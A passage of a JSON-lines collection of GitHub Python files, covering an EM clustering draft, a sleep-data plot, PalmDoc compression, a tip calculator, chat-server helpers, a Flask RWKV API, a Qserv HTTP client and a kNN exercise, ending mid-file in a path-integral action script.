+{"seq_id":"34431630023","text":"#!/usr/bin/python\n\n__author__ = \"posixroot\"\n\nimport sys\nimport os\nimport random\nimport math\nimport numpy as np\n\n\ndef compute_parameters(cluster_names, vector_length, training_data):\n    \"\"\"This function computes the EM algorithm.\"\"\"\n\n    # print \"AI HW1\\n\"\n    #\n    # if len(argv) != 4:\n    #     print \"Usage: python guassmix.py <#clusters>  \"\n    #     sys.exit()\n    #\n    # os.path.dirname(os.path.abspath(__file__))\n    # clusters = int(argv[1])\n    # data = argv[2] #'wine.train'\n    # model = argv[3] #'wineout'\n    #\n    # random.seed(clusters*random.random())\n\n    # f = open(data, 'r')\n\n    mu = {}\n    variance = {}\n    clusters = len(cluster_names)\n\n    sorted_data = {}\n    for item in training_data:\n        label = item.keys()[0]\n        if sorted_data.has_key(label):\n            sorted_data[label].append(item.get(label))\n        else:\n            sorted_data[label] = []\n            sorted_data[label].append(item.get(label))\n\n    for label in sorted_data.keys():\n        mat2d = np.array(sorted_data[label])\n        mu[label] = list(np.mean(mat2d, axis=0))\n        variance[label] = list(np.var(mat2d, axis=0))\n    \n    return mu, variance\n\n\n\n'''\n    for item in training_data:\n        item\n\n\n    testdata = []\n\n    testrows, testfeatures = f.readline().split()\n    testrows = int(testrows)\n    testfeatures = int(testfeatures)\n\n    for line in f:\n        testdata.append([float(x) for x in line.split()])\n\n    #################print testdata[12]\n\n    #Initialize prior values for all the clusters\n    prior = []\n    for i in range(clusters):\n        prior.append(1/float(clusters))\n\n    ############print '\\nprior check: '\n    ############print prior\n\n    #Find the min, max and range of each of the features\n    maxarr = []\n    minarr = []\n    for i in range(testfeatures):\n        temp = []\n        for j in range(testrows):\n            temp.append(testdata[j][i])\n        maxarr.append(max(temp))\n        minarr.append(min(temp))\n\n    rangearr = [abs(a-b) for a,b in zip(maxarr, minarr)]\n\n    #Initialize mu for all clusters. Method 1 (random datapoints as means)\n    mu = []\n    for i in range(clusters):\n        mu.append(random.choice(testdata))\n\n    #Method 2 to Initialize the mean(uniform dist. over range). 
To enable, uncomment the below lines.\n #mu = []\n #for i in range(clusters):\n #mu.append([a+(b*i/clusters) for a,b in zip(minarr,rangearr)])\n\n #mu.append(testdata[1])\n #mu.append(testdata[60])\n #mu.append(testdata[140])\n\n\n #Initialize Standard Deviation values for all the clusters\n sd = []\n for i in range(clusters):\n frac = random.random()\n sd.append([a*frac for a in rangearr])\n\n ########print \"sd values:\"\n ########for i in range(clusters):\n ########print 'sd[0] is ', sd[i]\n ########print '\\n'\n\n loopvar = 1\n #Iteration 1\n while(loopvar>0):\n logprior = []\n for i in range(clusters):\n #ell.append(testdata)\n logprior.append(math.log(prior[i]))\n\n ############print 'logprior: ', logprior\n\n ell = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n temp.append([(-1)*((a-b)**2)/(2*c*c) for a,b,c in zip(testdata[j],mu[i],sd[i])])\n ell.append(temp)\n\n temp2 = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n temp.append([a+(-0.5*math.log(2*math.pi*b)) for a,b in zip(ell[i][j],sd[i])])\n temp2.append(temp)\n ell = []\n ell = temp2[:]\n\n temp2 = []\n for i in range(clusters):\n temp = []\n for j in range(testrows):\n sumx = 0.0\n for k in range(testfeatures):\n sumx += ell[i][j][k]\n temp.append(sumx)\n temp2.append(temp)\n ell = []\n ell = temp2[:]\n\n #print '\\n\\nEll\\n',loopvar\n #for i in range(clusters):\n #print ell[i][0]\n\n #loop break condition\n if(loopvar>1):\n ellmat = numpy.array(ell)\n oldellmat = numpy.array(oldell)\n\n loopbreaker = 1\n for i in range(clusters):\n for j in range(testrows):\n ellmat[i,j] = math.fabs((ellmat[i,j] - oldellmat[i,j])/oldellmat[i,j])\n if(ellmat[i,j]>=0.001):\n loopbreaker = 0\n if(loopbreaker == 0):\n break\n\n if(loopbreaker==1):\n break\n\n ellprior = []\n for i in range(clusters):\n ellprior.append([logprior[i]+x for x in ell[i]])\n\n ########print '\\n\\nElls are: '\n ########for i in range(clusters):\n ########print ell[i][12]\n\n ########print '\\n\\nEllpriors are: '\n ########for i in range(clusters):\n ########print ellprior[i][12]\n\n lsxmax = []\n for i in range(testrows):\n temp = []\n for j in range(clusters):\n temp.append(ellprior[j][i])\n lsxmax.append(max(temp))\n\n ########print 'lsxmax is: ', lsxmax[12]\n\n\n temp = []\n for i in range(clusters):\n temp.append([a-b for a,b in zip(ellprior[i],lsxmax)])\n ellprior = []\n ellprior = temp[:]\n\n epost = []\n #for i in range(clusters):\n #epost.append(ellprior[i])\n epost = ellprior[:]\n\n\n #print '\\n'\n #for i in range(clusters):\n #print 'epost[0][12] is: ', epost[i][12]\n\n\n\n ############print '\\nELLPRIOR CHECK (with lsxmax subtracted): '\n ############for i in range(clusters):\n ############print ellprior[i][12]\n\n temp = []\n for i in range(clusters):\n temp.append([math.exp(a) for a in ellprior[i]])\n ellprior = []\n ellprior = temp[:]\n\n ############print '\\nELLPRIOR CHECK (E power): '\n ############for i in range(clusters):\n ############print ellprior[i][12]\n\n sumarr = []\n for i in range(testrows):\n sumrow = 0.0\n for j in range(clusters):\n sumrow += ellprior[j][i]\n sumarr.append((-1)*math.log(sumrow))\n\n #print '\\nThe sumarr test: '\n #print sumarr[12]\n\n temp = []\n for i in range(clusters):\n temp.append([a+b for a,b in zip(epost[i],sumarr)])\n epost = []\n epost = temp[:]\n\n ############print '\\n The posterior check: '\n ############for i in range(clusters):\n ############print epost[i][12]\n\n temp = []\n for i in range(clusters):\n temp.append([math.exp(a) for a in epost[i]])\n 
epost = []\n epost = temp[:]\n\n ############print '\\n The posterior check (normal space): '\n ############for i in range(clusters):\n ############print epost[i][12]\n\n ##End of E step\n\n #M Step\n priorval = []\n for i in range(clusters):\n sumcol = 0.0\n for j in range(testrows):\n sumcol += epost[i][j]\n #smoothening incorporated so that prior is never 0\n priorval.append((sumcol+0.00001)/testrows)\n\n ############print '\\n PriorVal check: '\n ############for i in range(clusters):\n ############print priorval[i]\n\n muval = []\n for i in range(clusters):\n temp = []\n for j in range(testfeatures):\n sumval = 0.0\n for k in range(testrows):\n sumval += (testdata[k][j]*epost[i][k])\n temp.append(sumval)\n muval.append(temp)\n\n ############print '\\n Muval check (before division): '\n ############for i in range(clusters):\n ############print muval[i]\n\n temp = []\n for i in range(clusters):\n temp.append([a/(priorval[i]*testrows) for a in muval[i]])\n muval = temp[:]\n\n ############print '\\n Muval check (after div): '\n ############for i in range(clusters):\n ############print muval[i]\n\n sdval = []\n for i in range(clusters):\n temp = []\n for j in range(testfeatures):\n sumval = 0.0\n for k in range(testrows):\n sumval += (((testdata[k][j]-muval[i][j])**2)*epost[i][k])\n temp.append(sumval)\n sdval.append(temp)\n\n ############print '\\n sdval check (before division): '\n ############for i in range(clusters):\n ############print sdval[i]\n\n temp = []\n for i in range(clusters):\n #smoothening incorporated so that sd can never be 0\n temp.append([math.sqrt((a+0.00001)/(priorval[i]*testrows)) for a in sdval[i]])\n sdval = []\n sdval = temp[:]\n\n ############print '\\n sdval check (after division): '\n ############for i in range(clusters):\n ############print sdval[i]\n\n oldell = ell[:]\n prior = priorval[:]\n mu = muval[:]\n sd = sdval[:]\n\n loopvar +=1\n\n print \"\\nThreshold met. 
Loop Exited!\\n\\nFor Reference: \"\n    print \"\\nPrior val: \", prior\n    print \"\\nMu val: \", mu\n    print \"\\nSD val: \", sd\n    for i in range(clusters):\n        print \"\\nOLDELL row vals: \", oldell[i]\n\n    print '\\n\\nNumber of loops: ', loopvar\n\n    outf = open(model, 'w')\n    outf.write(str(clusters)+' '+str(testfeatures)+'\\n')\n    for i in range(clusters):\n        outf.write(str(prior[i])+' ')\n        for j in range(testfeatures):\n            outf.write(str(mu[i][j])+' ')\n        for j in range(testfeatures):\n            outf.write(str(sd[i][j])+' ')\n        outf.write('\\n')\n\n    outf.close()\n\n\n\nif __name__ == '__main__':\n    guassmix(sys.argv)\n\n'''\n","repo_name":"posixroot/CodeEM","sub_path":"compute_parameters.py","file_name":"compute_parameters.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"19221813049","text":"from utils import (\n    get_data,\n    get_season,\n    save_plot,\n    default_style,\n    add_hline,\n    SEASON_COLORS,\n    COLUMN_NAMES,\n)\nfrom plotly import express as px\nfrom plotly.graph_objects import Figure\n\nfrom functools import reduce\n\n\ndef make_plot(\n    time_granularity: str = \"Month\",\n    time_group: bool = False,\n    dashboard: bool = False,\n    testing: bool = False,\n) -> Figure:\n    # get data\n    df = (\n        get_data(\n            \"fnl_sleep__obt\", (\"sleep_year\", \"sleep_month\", \"corrected_hours\"), testing\n        )\n        .rename(columns=COLUMN_NAMES)\n        .rename(columns={\"Real sleep hours\": \"Duration\"})\n    )\n\n    # get columns to group with\n    if time_granularity == \"Month\":\n        if time_group is False:\n            group_cols = [\"Year\", \"Month\"]\n            label = \"Date\"\n        else:\n            group_cols = label = \"Month\"\n    else:\n        group_cols = label = \"Year\"\n\n    # group and clean data\n    df = df.groupby(group_cols).mean().reset_index()\n    if label == \"Date\":\n        df[label] = reduce(lambda a, b: df[a] + \"-\" + df[b], group_cols)\n    if time_granularity == \"Month\":\n        df[\"Season\"] = get_season(df[\"Month\"])\n    avg = df[\"Duration\"].mean()\n\n    # make plot\n    fig = px.bar(\n        df,\n        x=label,\n        y=\"Duration\",\n        color=\"Season\" if time_granularity == \"Month\" else \"Duration\",\n        color_continuous_scale=px.colors.sequential.Aggrnyl_r,\n        color_discrete_map=SEASON_COLORS,\n    )\n\n    add_hline(fig, avg, dashboard)\n    default_style(fig, dashboard)\n\n    if dashboard is False:\n        save_plot(fig, f\"duration_by_{label.lower()}\", testing)\n\n    return fig\n\n\ndef main():\n    fig = make_plot()\n\n    fig.show()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"EloiSanchez/sleep_android_viz","sub_path":"plots/sleep_duration.py","file_name":"sleep_duration.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"18176005750","text":"# %% [markdown]\n# Read the file\n\n# %%\ninput = \"\"\n\nwith open('size.inp', 'r') as fi:\n    input = fi.read()\n\n# %% [markdown]\n# Split the data into height and weight pairs\n\n# %%\nheight_and_weight_list = input.split(\"\\n\")\nprint(height_and_weight_list)\n\n# %% [markdown]\n# Create the size.out file\n\n# %%\nfile_out = open(\"size.out\", \"x\")\n\n# %% [markdown]\n# Check the conditions and write the results to the file\n\n# %%\nfor height_and_weight in height_and_weight_list:\n    [height, weight] = height_and_weight.split(\" \")\n    height = float(height)\n    weight = int(weight)\n    if (1.6 <= height <= 1.65) & (55 <= weight <= 60):\n        file_out.write(\"S\\n\")\n    elif (1.66 <= height <= 1.69) & (60 <= weight <= 65):\n        file_out.write(\"M\\n\")\n    elif (1.70 <= height <= 
1.74) & (66 <= weight <= 70):\n        file_out.write(\"L\\n\")\n    elif (1.75 <= height <= 1.76) & (70 <= weight <= 76):\n        file_out.write(\"XL\\n\")\n    elif (1.75 <= height <= 1.77) & (76 <= weight <= 80):\n        file_out.write(\"XXL\\n\")\n    else:\n        file_out.write(\"NO\\n\")\n\n\n# %% [markdown]\n# Close the file\n\n# %%\nfile_out.close()\n","repo_name":"Datngo2001/ThiThu","sub_path":"size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"72916611666","text":"import io\nimport sys\nfrom struct import pack\n\n\ndef decompress_doc(data):\n    uncompressed = b''\n    skip_next = 0\n\n    for idx, item in enumerate(data):\n        if skip_next:\n            skip_next -= 1\n            continue\n\n        if item in range(1, 9):\n            # copy amount of bytes as in item\n            skip_next = item\n            for amount in range(1, item + 1):\n                uncompressed += data[idx + amount].to_bytes(1, sys.byteorder)\n\n        elif item < 128:\n            # direct ascii copy\n            uncompressed += item.to_bytes(1, sys.byteorder)\n\n        elif item >= 192:\n            # merged space and ascii character\n            uncompressed += b' ' + (item ^ 128).to_bytes(1, sys.byteorder)\n\n        else:\n            # compressed data, item contains how many characters should be\n            # repeated for the next one.\n            skip_next = 1\n            item = (item << 8) + data[idx + 1]\n            character_index = (item & 0x3FFF) >> 3\n            for _ in range((item & 7) + 3):\n                uncompressed += (uncompressed[len(uncompressed) -\n                                              character_index]\n                                 .to_bytes(1, sys.byteorder))\n\n    return uncompressed\n\n\ndef compress_doc(data):\n    out = io.BytesIO()\n    i = 0\n    ldata = len(data)\n    while i < ldata:\n        if i > 10 and (ldata - i) > 10:\n            chunk = b''\n            match = -1\n            for j in range(10, 2, -1):\n                chunk = data[i:i+j]\n                try:\n                    match = data.rindex(chunk, 0, i)\n                except ValueError:\n                    continue\n                if (i - match) <= 2047:\n                    break\n                match = -1\n            if match >= 0:\n                n = len(chunk)\n                m = i - match\n                code = 0x8000 + ((m << 3) & 0x3ff8) + (n - 3)\n                out.write(pack('>H', code))\n                i += n\n                continue\n        ch = data[i:i+1]\n        och = ord(ch)\n        i += 1\n        if ch == b' ' and (i + 1) < ldata:\n            onch = ord(data[i:i+1])\n            if onch >= 0x40 and onch < 0x80:\n                out.write(pack('>B', onch ^ 0x80))\n                i += 1\n                continue\n        if och == 0 or (och > 8 and och < 0x80):\n            out.write(ch)\n        else:\n            j = i\n            binseq = [ch]\n            while j < ldata and len(binseq) < 8:\n                ch = data[j:j+1]\n                och = ord(ch)\n                if och == 0 or (och > 8 and och < 0x80):\n                    break\n                binseq.append(ch)\n                j += 1\n            out.write(pack('>B', len(binseq)))\n            out.write(b''.join(binseq))\n            i += len(binseq) - 1\n    return out.getvalue()\n","repo_name":"gryf/ebook-converter","sub_path":"ebook_converter/ebooks/compression/palmdoc.py","file_name":"palmdoc.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"48"}
+{"seq_id":"19065803807","text":"#!/usr/bin/env python3\n\nbill = float(input(\"Total bill amount? \"))\nservice = input(\"Level of service? \")\nservice = service.lower()\nsplit = float(input(\"Split how many ways? 
\"))\n\nif service == 'good':\n tip_percent =.2\n \nelif service == 'fair':\n tip_percent = .15\n \nelif service == 'bad':\n tip_percent = .1\nelse:\n exit = 1\n print(\"Sorry try again!\")\n \nif exit != 1: \n tip = float(bill*tip_percent)\n total = float(bill+tip)\n perperson = float(total/split)\n print(\"Tip amount: {}\".format(tip))\n print(\"Total amount: {}\".format(total))\n print(\"Amount per person: {}\".format(perperson))","repo_name":"iuriarte/python-exercises-iu","sub_path":"week_1/tip_calc2.py","file_name":"tip_calc2.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24403931413","text":"class Node:\n\tdef __init__(self,x):\n\t\tself.neighbours=[]\n\t\tself.name=x\n\t\tself.complist=[]\ns = raw_input()\nnumbers = map(int, s.split())\nn=numbers[0]\nm=numbers[1]\nA=[]\nfor i in range(n):\n\tA.append(Node(i))\n\nfor i in range(m):\n\ts = raw_input()\n\tnumbers = map(int, s.split())\t\n\tA[numbers[0]].neighbours.append(A[numbers[1]])\n\tA[numbers[1]].neighbours.append(A[numbers[0]])","repo_name":"AbhishekTiwari0812/python_codes","sub_path":"HackerRankGraph1.py","file_name":"HackerRankGraph1.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19519442865","text":"from global_data import online_clients\nimport rsa\n\n\ndef save_keys(pubkey, privkey):\n with open('public_key.pem', 'wb') as f:\n f.write(pubkey.save_pkcs1())\n with open('private_key.pem', 'wb') as f:\n f.write(privkey.save_pkcs1())\n\n\n# 从文件中加载公钥和私钥\ndef load_keys():\n with open('public_key.pem', 'rb') as f:\n pubkey = rsa.PublicKey.load_pkcs1(f.read())\n\n with open('private_key.pem', 'rb') as f:\n privkey = rsa.PrivateKey.load_pkcs1(f.read())\n return pubkey, privkey\n\ndef find_userid_by_socket(socket_to_find):\n for socket, userid in online_clients.items():\n if socket == socket_to_find:\n return userid\n return None # 如果没找到对应的userid,返回None\n\n\ndef find_friend_id(user_id, chat_id):\n print(\"尝试通过chat_id和user_id找到friend_id……\")\n chat_id = str(chat_id)\n if len(chat_id) == 10:\n first_five = int(chat_id[:5])\n last_five = int(chat_id[5:])\n if first_five == user_id:\n friend_id = last_five\n return friend_id\n elif last_five == user_id:\n friend_id = first_five\n return friend_id\n else:\n print(\"无法确定 receiver_id,可能存在错误。\")\n return -1\n else:\n print(\"chat_id不是十位数,不是私聊chat_id\")\n return -2\n","repo_name":"TT2TER/Echoplex","sub_path":"server/tool_fuction.py","file_name":"tool_fuction.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5091108692","text":"from flask import Flask\nfrom flask import request, jsonify\nimport base_chat\napp = Flask(__name__)\n\n@app.route('/continue', methods=['GET'])\ndef promptNext():\n \n response = base_chat.on_message(\"+\")\n output_string = response\n \n return output_string\n\n@app.route('/api', methods=['GET'])\ndef prompt():\n\n text = request.args.get('prompt')\n \n response = base_chat.on_message(text)\n output_string = response\n \n return output_string\n\n@app.route('/instruct', methods=['GET'])\ndef instruct():\n \n text = request.args.get('prompt')\n \n response = base_chat.on_message(\"+i \" + text)\n output_string = response\n \n return output_string\n\n@app.route('/reset', methods=['GET'])\ndef reset():\n base_chat.on_message(\"+reset\")\n return 
\"reset\"\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"RafaRed/RWKV-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"19305367203","text":"import getpass\nimport json\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Any, Dict, Tuple, Union\n\n# ----------------------------\n# Imports for other modules --\n# ----------------------------\nimport requests\nfrom qserv import jsonparser\nfrom requests.adapters import HTTPAdapter\nfrom retry import retry\nfrom urllib3.util import Retry\n\nfrom . import util, version\nfrom .exception import IngestError, ReplicationControllerError\n\nDEFAULT_AUTH_PATH = \"~/.lsst/qserv\"\nDEFAULT_TIMEOUT_READ_SEC = 300.0\nDEFAULT_TIMEOUT_WRITE_SEC = 600.0\n\n# ---------------------------------\n# Local non-exported definitions --\n# ---------------------------------\n_DEFAULT_CONNECTION_TIMEOUT = 5.0\n_MAX_RETRY_ATTEMPTS = 3\n\n_LOG = logging.getLogger(__name__)\n\n\ndef download_file(url: str, dest: str) -> None:\n response = requests.get(url, stream=True)\n text_file = open(dest, \"wb\")\n for chunk in response.iter_content(chunk_size=1024):\n text_file.write(chunk)\n text_file.close()\n\n\ndef file_exists(url: str) -> bool:\n \"\"\"Check if a file exists on a remote HTTP server.\"\"\"\n response = requests.head(url)\n return response.status_code == 200\n\n\ndef json_load(base_url: str, filename: str) -> Dict[Any, Any]:\n \"\"\"Load a JSON file located at a given URL.\n\n Parameters\n ----------\n base_url: `str`\n JSON file location\n filename: `str`\n JSON file name\n\n Returns\n -------\n json_data: `dict`\n JSON data represented as a dictionary\n\n Raises\n ------\n IngestError:\n Raise is URI scheme is not in http://, https://, file://\n\n \"\"\"\n str_url = urllib.parse.urljoin(util.trailing_slash(base_url), filename)\n url = urllib.parse.urlsplit(str_url, scheme=\"file\")\n if url.scheme in [\"http\", \"https\"]:\n r = requests.get(str_url)\n return r.json()\n elif url.scheme == \"file\":\n with open(url.path, \"r\") as f:\n return json.load(f)\n else:\n raise IngestError(\"Unsupported URI scheme for \", url)\n\n\ndef _get_retry_object(retries: int = 5, backoff_factor: float = 0.2) -> Retry:\n \"\"\"Create an instance of :obj:`urllib3.util.Retry`.\n\n With default arguments (5 retries with 0.2 backoff factor), urllib3 will\n sleep for 0.2, 0.4, 0.8, 1.6, 3.2 seconds between attempts.\n\n \"\"\"\n\n # See\n # https://findwork.dev/blog/advanced-usage-python-requests-timeouts-retries-hooks/#retry-on-failure\n return Retry(\n total=retries,\n read=retries,\n connect=retries,\n allowed_methods=[\"GET\"],\n backoff_factor=backoff_factor,\n status_forcelist=[429, 500, 502, 503, 504],\n )\n\n\nclass Http:\n \"\"\"Manage http(s) connections\n designed to connect to Qserv Replication Controller\"\"\"\n\n def __init__(\n self,\n timeout_read_sec: float = DEFAULT_TIMEOUT_READ_SEC,\n timeout_write_sec: float = DEFAULT_TIMEOUT_WRITE_SEC,\n auth_path: str = DEFAULT_AUTH_PATH,\n ) -> None:\n \"\"\"Set http connections retry/timeout errors.\"\"\"\n self.auth_path = auth_path\n adapter = HTTPAdapter(max_retries=_get_retry_object())\n # Session is only used for the GET method\n self.http = requests.Session()\n self.http.mount(\"https://\", adapter)\n self.http.mount(\"http://\", adapter)\n self.authKey = self._authenticate()\n self.timeout_read_sec = timeout_read_sec\n 
self.timeout_write_sec = timeout_write_sec\n\n def is_reachable(self, url: str) -> bool:\n \"\"\"Check if a given http URL is reachable through the network.\"\"\"\n try:\n self.http.head(url)\n except requests.exceptions.ConnectionError as e:\n _LOG.warning(\"Unable to connect to url %s, error: %s\", url, e)\n return False\n return True\n\n def _authenticate(self) -> str:\n try:\n with open(os.path.expanduser(self.auth_path), \"r\") as f:\n authKey = f.read().strip()\n except IOError:\n _LOG.warning(\"Cannot find %s\", self.auth_path)\n authKey = getpass.getpass()\n return authKey\n\n def get(self, url: str, payload: Dict[str, Any] = dict(), auth: bool = True) -> Dict:\n \"\"\"Send a GET query to replication controller/worker http(s) URL\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n payload : `dict` [`str`, `Any`], optional\n JSON payload, Defaults to dict().\n auth : `bool`, optional\n Perform HTTP authentication. Defaults to True.\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n \"\"\"\n if auth is True:\n payload[\"auth_key\"] = self.authKey\n params = {\"version\": version.REPL_SERVICE_VERSION}\n r = self.http.get(url, params=params, json=payload, timeout=self.timeout_read_sec)\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"GET: success\")\n return response_json\n\n def post(\n self, url: str, payload: Dict[str, Any] = None, auth: bool = True, no_readtimeout: bool = False\n ) -> Dict:\n \"\"\"Send a POST query to an http(s) URL.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n payload : `Dict[str, Any]`, optional\n JSON payload, Defaults to None.\n auth : `bool`, optional\n Perform HTTP authentication. Defaults to True.\n timeout : `int`, optional\n Query time-out. Defaults to None.\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n \"\"\"\n if payload is None:\n payload = dict()\n if auth is True:\n payload[\"auth_key\"] = self.authKey\n timeouts: Union[float, Tuple[float, float], Tuple[float, None]]\n if no_readtimeout:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, None)\n else:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, self.timeout_write_sec)\n try:\n r = requests.post(url, json=payload, timeout=timeouts)\n except (requests.exceptions.RequestException, ConnectionResetError) as e:\n _LOG.critical(\"Error when sending POST request to url %s\", url)\n e.args = (\n f\"POST request to url {url} with payload {payload} failed\",\n *e.args,\n )\n raise e\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"POST %s: success\", url)\n return response_json\n\n @retry(requests.exceptions.ConnectTimeout, delay=5, tries=_MAX_RETRY_ATTEMPTS)\n def post_retry(\n self, url: str, payload: Dict[str, Any] = None, auth: bool = True, no_readtimeout: bool = False\n ) -> Dict:\n \"\"\"Send a POST query to an http(s) URL and retry on time-out error.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n timeout : `int`\n Timeout in seconds\n payload : `Dict[ str, Any ]`, optional\n JSON payload, Defaults to None.\n auth : `bool`, optional\n Perform HTTP authentication. 
Defaults to True.\n\n Returns:\n response_json : `dict`\n JSON response\n \"\"\"\n if payload is None:\n payload = dict()\n return self.post(url, payload, auth, no_readtimeout)\n\n def put(self, url: str, payload: Dict[str, Any] = None, no_readtimeout: bool = True) -> Dict:\n \"\"\"Send a PUT query to an http(s) URL.\n\n Parameters\n ----------\n url : str\n Http(s) URL\n payload : Dict[str, Any], optional\n JSON payload, by default None\n timeout : int, optional\n Time-out for query, by default None\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n \"\"\"\n if payload is None:\n payload = dict()\n\n # Set version if it does not exists\n payload[\"version\"] = payload.get(\"version\", version.REPL_SERVICE_VERSION)\n payload[\"auth_key\"] = self.authKey\n\n timeouts: Union[float, Tuple[float, float], Tuple[float, None]]\n if no_readtimeout:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, None)\n else:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, self.timeout_write_sec)\n r = requests.put(url, json=payload, timeout=timeouts)\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"PUT: success\")\n return response_json\n\n def delete(self, url: str, timeout: int = None) -> Dict:\n \"\"\"Send a DELETE query to an http(s) URL.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n timeout : `int`, optional\n Time-out for query, by default None\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n \"\"\"\n json = {\"version\": version.REPL_SERVICE_VERSION, \"auth_key\": self.authKey}\n r = requests.delete(url, json=json, timeout=timeout)\n r.raise_for_status()\n response_json = r.json()\n if not response_json[\"success\"]:\n _LOG.critical(\"%s %s\", url, response_json[\"error\"])\n raise ReplicationControllerError(\"Error in JSON response (DELETE)\", url, response_json[\"error\"])\n _LOG.debug(\"DELETE: success\")\n return response_json\n\n\ndef get_fqdn(fqdns: str, port: int, scheme: str = \"http\") -> str:\n \"\"\"Return fqdn of the first reachable scheme://fqdn:port entry.\n\n Parameters\n ----------\n fqdns: `str`\n comma-separated list of fqdns\n port: `int`\n url port to reach\n\n Returns\n -------\n fqdn : `str`\n First reachable host fqdn, empty string if not fqdn is reachable\n\n \"\"\"\n http = Http()\n for fqdn in fqdns.split(\",\"):\n url = f\"{scheme}://{fqdn}:{port}\"\n if http.is_reachable(url):\n return fqdn\n return \"\"\n","repo_name":"lsst-dm/qserv-ingest","sub_path":"rootfs/ingest/python/qserv/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10215354169","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split \nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport mglearn\nfrom sklearn.datasets.samples_generator import make_blobs\n\ncancer = load_breast_cancer()\n#print(cancer.DESCR)\nprint(cancer.feature_names)\nprint(cancer.target_names) \nprint(type(cancer.data))\nprint(cancer.data)\nprint(cancer.data.shape)\nprint(\"\\n================================\")\n\nraw_data = 
pd.read_csv('C:/Users/N0009/Downloads/breast-cancer-wisconsin-data.csv')\nprint(raw_data.tail)\n#mglearn.plots.plot_knn_classification(n_neighbors=7)\n#plt.show()\n\nX_train, X_test, y_train, y_test = train_test_split(cancer.data, cancer.target, stratify=cancer.target, random_state=42)\nknn = KNeighborsClassifier()\nknn.fit(X_train, y_train)\nprint('Accuracy of KNN n-5, on the training set: {:.2f}'.format(knn.score(X_train, y_train)))\nprint('Accuracy of KNN n-5, on the training set: {:.2f}'.format(knn.score(X_test, y_test)))\nX_train, X_test, y_train, y_test = train_test_split(cancer.data, cancer.target, stratify=cancer.target, random_state=65)\n\ntraining_accuracy = []\ntest_accuracy = []\n\nneighbors_setting = range(1,51)\nfor n_neighbors in neighbors_setting:\n clf = KNeighborsClassifier(n_neighbors = n_neighbors)\n clf.fit(X_train, y_train)\n training_accuracy.append(clf.score(X_train, y_train))\n test_accuracy.append(clf.score(X_test, y_test))\n\nplt.plot(neighbors_setting, training_accuracy, label=\"Train accuracy\")\nplt.plot(neighbors_setting, test_accuracy, label=\"Test accuracy\")\nplt.ylabel('Accuracy')\nplt.xlabel('Number of Neighbors')\nplt.legend()\nplt.show()","repo_name":"nicholasfl/Portfolio","sub_path":"nicholas/side_projects/machine_learning_based/kNN1.py","file_name":"kNN1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42899276502","text":"# -*- coding: utf-8 -*-\r\n\r\n######################## ACTIONS ########################\r\ndef S_HO(x, h, m, w):\r\n \"\"\"\r\n Euclidean-time action of the 1D, 1-particle H.O.\r\n \r\n Parameters\r\n ----------\r\n x : list\r\n (positions of the) Path.\r\n\r\n Returns\r\n -------\r\n S : float\r\n Action of the path given as input.\r\n\r\n \"\"\"\r\n S_prime = 0.\r\n for i in range(len(x)-1):\r\n x_i1 = x[i+1]\r\n x_i = x[i]\r\n S_prime += ((x_i1-x_i)/h)**2+(w*(x_i1+x_i)/2)**2\r\n \r\n return 0.5*m*h*S_prime\r\n\r\ndef S_double_well(x, h, m, w):\r\n S_prime = 0.\r\n alpha = 0.05\r\n beta = -1.\r\n for i in range(len(x)-1):\r\n x_i1 = x[i+1]\r\n x_i = x[i]\r\n K = ((x_i1-x_i)/h)**2\r\n V = alpha*((x_i1+x_i)/2)**4 + 